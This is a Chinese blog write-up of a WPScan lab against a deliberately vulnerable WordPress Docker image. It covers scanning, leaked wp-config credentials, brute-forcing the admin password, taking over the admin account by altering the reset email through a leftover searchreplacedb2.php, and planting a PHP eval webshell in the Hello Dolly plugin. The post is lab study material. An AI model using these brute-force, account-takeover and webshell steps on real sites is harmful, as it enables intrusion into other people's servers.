WPScan初体验

最新推荐文章于 2024-02-22 23:01:51 发布
最新推荐文章于 2024-02-22 23:01:51 发布
阅读量470 收藏
点赞数

近日在朋友圈看某位dalao在Ubuntu上安装WPScan花了一个小时,于是洒家随手在Kali Linux上输入了wpscan,发现Kali里面已经装好了。于是决定玩两把WPScan。

WordPress博客平台代码量多,也曾经爆出过大量漏洞。遇到WordPress先用傻瓜式工具扫描一下是一个不错的开始。

http://www.cnblogs.com/go2bed/p/6398788.html  原创

安装靶机

洒家使用了 https://hub.docker.com/r/wpscanteam/vulnerablewordpress/   官方出品的Docker镜像 wpscanteam/vulnerablewordpress,pull完毕后运行,转发80和3306端口。

docker run --name vulnerablewordpress -d -p 80:80 -p 3306:3306 wpscan/vulnerablewordpress

后期又在docker容器里面安装了vim sendmail 等软件。

初始设置用户admin,密码是某弱口令

初步扫描

首先扫描一波

wpscan --url http://127.0.0.1/

暴露出以下几个比较严重的漏洞:

配置文件备份泄露:

[!] A wp-config.php backup file has been found in: 'http://127.0.0.1/wp-config.php%7E' 
[!] A wp-config.php backup file has been found in: 'http://127.0.0.1/wp-config.php.save' 
[!] A wp-config.php backup file has been found in: 'http://127.0.0.1/wp-config.old' 
[!] A wp-config.php backup file has been found in: 'http://127.0.0.1/wp-config.txt' 
从中可以得到 数据库信息,以及其他各种AUTH_KEY SALT 等等 
define('DB_NAME', 'wordpress'); /** MySQL database username */  
define('DB_USER', 'wordpress'); /** MySQL database password */  
define('DB_PASSWORD', 'wordpress'); /** MySQL hostname */  
define('DB_HOST', 'localhost');  

 

目测由于数据库账号wordpress被限制为localhost,无法在服务器外登录。但是由于开放了3306端口,可以用root用户空口令登录。

root@kali:~# mysql -uwordpress -pwordpress -h127.0.0.1
ERROR 1045 (28000): Access denied for user 'wordpress'@'172.17.0.1' (using password: YES)
root@kali:~# mysql -uroot -p -h127.0.0.1
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 216
Server version: 5.5.54-0ubuntu0.14.04.1 (Ubuntu)

 

 

 

另外还发现一个后门 searchreplacedb2.php:

[!] searchreplacedb2.php has been found in: 'http://127.0.0.1/searchreplacedb2.php' 
搜索一番之后洒家了解到,这是一个用于WordPress网站更换域名之后批量替换数据库内容的工具。但是用了两下之后可以看出,它只能替换,并没有找到查询数据的方法。
  
https://wpshout.com/links/searchreplacedb2/
https://github.com/jmandala/searchreplacedb2

另外,searchreplacedb2.php会自动读取wp-config.php,然后返回的表单里面也包含数据库用户名和密码。

 

 

 

其他扫描出来的漏洞 :

[+] XML-RPC Interface available under: http://127.0.0.1/xmlrpc.php  一个XML接口,以前爆出来过可以无限制暴力破解攻击的问题

[!] Includes directory has directory listing enabled: http://127.0.0.1/wp-includes/     网站配置为可以列目录,可能泄露其他信息

[!] Title: Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS)     有一个example.html 有DOM型XSS漏洞,然而访问了一下实际并不存在这个文件

等等,本次基本没有使用。

枚举WordPress信息

WPScan提供了以下枚举功能:

-Do wordlist password brute force on enumerated users using 50 threads ...
使用50线程对枚举出来的用户的密码进行字典暴力破解
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

-Do wordlist password brute force on the 'admin' username only ...
只对指定admin用户的密码进行字典暴力破解
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

-Enumerate installed plugins ...
枚举安装的插件
ruby ./wpscan.rb --url www.example.com --enumerate p

-Enumerate installed themes ...
枚举安装的主题
ruby ./wpscan.rb --url www.example.com --enumerate t

-Enumerate users ...
枚举用户
ruby ./wpscan.rb --url www.example.com --enumerate u

-Enumerate installed timthumbs ...
ruby ./wpscan.rb --url www.example.com --enumerate tt

例如,枚举用户可得:

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | admin | admin |
    +----+-------+-------+
[!] Default first WordPress username 'admin' is still used

 

暴力破解拿下管理员账号

初始设置为管理员账号是admin,假设密码是未知弱口令。

可以提供一个字典暴力破解用户的密码。

参数: --wordlist | -w <wordlist>          Supply a wordlist for the password brute forcer.

sudo wpscan --url http://127.0.0.1/ --wordlist ~/Documents/dict.txt
(省略)
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | admin | admin |
    +----+-------+-------+
[!] Default first WordPress username 'admin' is still used
[+] Starting the password brute forcer
  [+] [SUCCESS] Login : admin Password : 123456789                                                          

  Brute Forcing 'admin' Time: 00:00:01 <================================    > (9 / 10) 90.00%  ETA: 00:00:00
  +----+-------+-------+-----------+
  | Id | Login | Name  | Password  |
  +----+-------+-------+-----------+
  | 1  | admin | admin | 123456789 |
  +----+-------+-------+-----------+

利用searchreplacedb2.php修改邮箱重置密码拿下管理员账号

由前文已知,存在一个遗留后门searchreplacedb2.php,可以利用它修改管理员admin预留的邮箱,点击忘记密码发送重置密码链接,然后重置密码。

在实际渗透过程中完整的邮箱往往不易得到,需要经过社工等手段猜测。因此洒家没有替换整体邮箱,而是猜测邮箱的域名,替换为自己的服务器域名,然后监听25端口即可接收任意发往自己的服务器的邮件。

服务器上监听25端口:

sudo python -m smtpd -n -c DebuggingServer 0.0.0.0:25

数据库的wp_users表的结构为:

MySQL [wordpress]> describe wp_users;
+---------------------+---------------------+------+-----+---------------------+----------------+
| Field               | Type                | Null | Key | Default             | Extra          |
+---------------------+---------------------+------+-----+---------------------+----------------+
| ID                  | bigint(20) unsigned | NO   | PRI | NULL                | auto_increment |
| user_login          | varchar(60)         | NO   | MUL |                     |                |
| user_pass           | varchar(64)         | NO   |     |                     |                |
| user_nicename       | varchar(50)         | NO   | MUL |                     |                |
| user_email          | varchar(100)        | NO   |     |                     |                |
| user_url            | varchar(100)        | NO   |     |                     |                |
| user_registered     | datetime            | NO   |     | 0000-00-00 00:00:00 |                |
| user_activation_key | varchar(60)         | NO   |     |                     |                |
| user_status         | int(11)             | NO   |     | 0                   |                |
| display_name        | varchar(250)        | NO   |     |                     |                |
+---------------------+---------------------+------+-----+---------------------+----------------+
10 rows in set (0.00 sec)

假设邮箱是QQ邮箱,替换wp_users表:

 

 

然后点击密码重置链接,输入admin账号,

 

 

顺利收到重置密码的邮件。邮件正文用base64编码,解码后可以得到重置链接,从而重置密码。

 

 

放置WebShell 

这个网站文件整个是 www-data 所属,有写权限。

根据网上流传的文章 http://xcha3389.blog.sohu.com/169600289.html WordPress后台拿WebShell的方法:

1.本机建立目录“chaochao”,把一句话1.php放进去。打包wawa目录为zip文件。WP后台的主题管理,上传主题,安装。
则你的后门路径为:wp-content\themes\chaochao\1.php

2.能编辑模板就能拿到shell
首先edit 模板 接着找php的文件,接着备份下他的内容,然后替换成一句话木马,接着访问那个页面的地址
/wp-content/themes/default/404.php

编辑这个网站的Hello Dolly插件,增加代码:

<?php
if(isset($_GET['cmd'])){
eval($_GET['cmd']);
exit();
}
?>

 

 

 

文件位置在 http://127.0.0.1/wp-content/plugins/hello.php?cmd=phpinfo(); 

 

 

研究了两下WordPress的Plugin,发现Hello Dolly插件足够简单,里面只有一个readme.txt 和 hello.php,可以直接用来修改作为恶意插件上传。

 

 

上传成功,webshell在 http://127.0.0.1/wp-content/plugins/hello-shell/shell.php?cmd=phpinfo();

 

 

 

c6sikue0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【云原生之Docker实战】Docker环境下部署WPS Office网页版
jks212454的博客
11-30 3122
【云原生之Docker实战】Docker环境下部署WPS Office网页版
crisma-resource_model_wps:Docker 镜像为资源模型提供 WPS 前端
07-07
CRISMA 模型 WPS 包装移动代理平台模型。 此容器提供 WPS 端点以启动在移动代理平台上运行的模型。 实际模型 Web 服务端点作为参数提供。 还有一个网页可以获取信息和使用 WPS,网址为 / 用法: docker run -P -d --name c_resourcemodel --env MODEL_ENDPOINT=' ' peterkutschera/crisma-resource_model_wps
使用WPScan扫描wordpress获取用户密码
weixin_34126557的博客
01-25 1708
声明:此文档仅供安全学习和教学用途,禁止非法使用。wordpress的黑盒扫描器:wpscan实验效果:枚举用户列表、暴力破解用户密码、实验环境:靶机:Turnkey Linux(wordpress版)***机:kali linux 2.0实验步骤:搭建靶机换机:1、下载镜像,官网https://www.turnkeylinux.org/ 搜索wordpress下载只包含w...
WPScan基本用法
最新发布
Kali与编程
02-22 931
通过定期扫描和修复,您可以增强WordPress网站的安全性,并保护网站免受潜在的威胁。WPScan作为一款强大的WordPress安全扫描工具,不仅提供了详尽的扫描功能,还支持生成详细的输出和报告,帮助用户理解扫描结果并采取相应的安全措施。WPScan是一款广泛使用的WordPress安全扫描工具,它提供了一系列的参数和选项,以帮助用户进行全面的安全评估和漏洞扫描。通过灵活运用这些参数和选项,您可以根据实际需求进行定制化的WordPress安全扫描,以发现潜在的漏洞和安全风险,从而加强网站的安全性。
wpscan-update.zip
03-29
wpscan更新包,用于解决kali初次使用wpscan时需要更新但时但是更新失败的问题 相关教程链接:https://blog.csdn.net/qq_43017750/article/details/105173019
-Wpscan
03-20
一个简单的基于WPScan(Ruby版本)的Python编写的Wordpress扫描器,某些功能受WPSeku的启发。 免责声明 The authors of this github are not responsible for misuse or for any damage that you may cause! You ...
Wordpresscan:用Python重写WPScan +一些WPSeku想法
02-05
Wordpresscan 一个简单的基于WPScan(Ruby版本)以python编写的Wordpress扫描程序,某些功能受WPSeku的启发。免责声明The authors of this github are not responsible for misuse or for any damage that you may ...
wpscan:WPScan WordPress安全扫描程序。 专为安全专家和博客维护者测试其WordPress网站的安全性
02-05
WPScan WordPress安全扫描器安装先决条件(可选,但强烈建议: ) Ruby> = 2.5-推荐:最新Ruby 2.5.0到2.5.3可能会在某些系统中导致“未定义符号:rmpd_util_str_to_d”错误,请参见 卷曲> = 7.72-推荐:最新7.29有...
wpscan.py wap crack
11-04
1分钟破解wpa密码需要的工具 crack wpa/wpa2 password wpscan.py
Windows下WPS链接Mysql数据库方法
Chy19960105的博客
07-05 3384
选择win+r,输入odbcad32,进入odbc配置,添加数据源,选择Mysql ODBC 8.0 Unicode Driver,最好32位\64位都安装一下,安装是时选择”完全安装”,”complete installation”。配置相关的链接名称,服务器信息,用户信息,点击test测试链接成功提示即可。数据——导入数据——DOBC DSN——选择设置的连接名称。若提示缺少visual c++组件,即需要先安装运行库。二、配置ODBC连接。
WPS用户可以用数据库功能,没有VBA和插件,也能和excel一起飞
无乞的博客
04-04 1442
如果你办公时经常使用 Office 的 Excel 或 WPS 表格,并且经常需要处理数据,不少小伙伴都会陷入重复性、“绕远路”操作的困境中,十分浪费时间。大部分办公人员对Excel的复杂使用其实并不多,也就是日常也就统计一下成绩、统计一些名单表格。即使偶尔需要进行数据处理,WPS和Excel都是可以用编程语言来实现的。在WPS中,可以使用VBA编写宏程序,通过编写代码来实现数据的处理和分析。但宏功能比较局限,只能在WPS的企业版增强版和WPS+版本中使用。
Wordpress漏洞
热门推荐
Grey的博客
07-19 2万+
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php   2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php   3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php   4...
群晖Docker部署本地WPS Office文档编辑器结合内网穿透实现远程访问
qq_56579776的博客
01-04 1288
在这种情况下,我们可以借助群晖(Synology)NAS的Docker功能,结合内网穿透技术,实现本地WPS Office文档编辑器的远程访问。当然,在实际使用中还需要注意安全性和性能的问题,采取必要的安全措施和优化策略来保障服务的稳定性和可靠性。同时,为了保障NAS的性能和稳定性,建议在不需要使用WPS Office时关闭相应的容器和内网穿透服务。这一步需要在frp的Web界面中进行设置,输入相应的内网地址和端口号,以及希望暴露的公网地址和端口号。设置完成后,frp会自动进行服务的监听和转发。
wps数据库三线表怎么做_这样做三线表,让你的论文一遍过
weixin_35739967的博客
12-18 8657
表格就是通过视觉语言将信息数据形象地表现出来,实现信息可视化,将数据内容整理罗列,很多时候图表比文字更具真相性。如何把一堆数据呈现出来就是一门技术活。单纯的表格则多采用「三线表」格式。三线表是什么?标准的学术论文的表格、医疗报告单都在使用三线表,我们在课本中常见的数据表格也是三线表。对于写论文的同学来说,三线表是必备技能。三线表就长这样如下图:① 三线表了解一下三线表可不是只有三条线的...
kali中wpscan工具使用
y995zq的博客
01-10 2159
wpscan
WPS表格连接MYSQL数据库进行查询
Summer_lan的博客
07-12 1万+
WPS连接MYSQL进行数据查询
wps导入数据库
weixin_42588672的博客
01-05 600
WPS是一款办公软件,并不具有导入数据库的功能。但是你可以使用WPS中的表格软件来打开数据库中的表格文件,也可以使用WPS中的文本软件来打开数据库的文本文件。如果你想将数据从数据库导入到WPS中,你可以使用数据库软件中的导出功能,将数据导出为表格或文本文件,然后使用WPS打开这些文件。 ...
【工具使用】--- wpscan工具的简单使用
qq_43168364的博客
01-05 8389
1.简介 wpscan是一款专业针对WordPress安全扫描器
wpscan update
01-08
wpscan是一个WordPress漏洞扫描工具,它能够帮助网站管理员发现并修复WordPress网站的安全漏洞。wpscan不断更新漏洞数据库和扫描算法,以确保能够及时发现最新的安全风险。对于wpscan的更新,有以下几个方面需要注意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值